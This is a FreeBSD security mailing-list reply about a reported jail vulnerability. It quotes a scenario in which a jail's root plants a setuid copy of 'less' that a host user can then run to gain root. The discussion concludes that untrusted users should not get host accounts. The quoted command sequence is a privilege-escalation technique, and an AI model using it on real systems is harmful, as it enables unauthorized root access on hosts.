misc/187307: Security vulnerability with FreeBSD Jail
James Gritton
jamie at freebsd.org
Thu Mar 6 00:54:44 UTC 2014
On 3/5/2014 4:39 PM, Xin Li wrote:
> This is NOT a problem with jail. For starters, it's very bad idea to
> give out host shell account, privileged or not, to jail users if they
> are not trusted. Let's consider this scenario:
>
> jail$ su -l
> jail# cp /usr/bin/less /bin/root_shell
> jail# chown root:wheel /bin/root_shell
> jail# chmod 6555 /bin/root_shell
> jail# logout
> jail$ logout
>
> Then, you basically have a setuid binary that can be reached from host
> system. As an attacker I would do:
>
> host$ /path/to/jail/bin/root_shell
That's an important point: jails are good for their *own* security,
but they make the base system insecure for allowing untrusted users.
I can see user accounts for the admin's own use (likely the condition
that was originally reported), but that's the only account I would
consider allowing.
- Jamie
More information about the freebsd-security
mailing list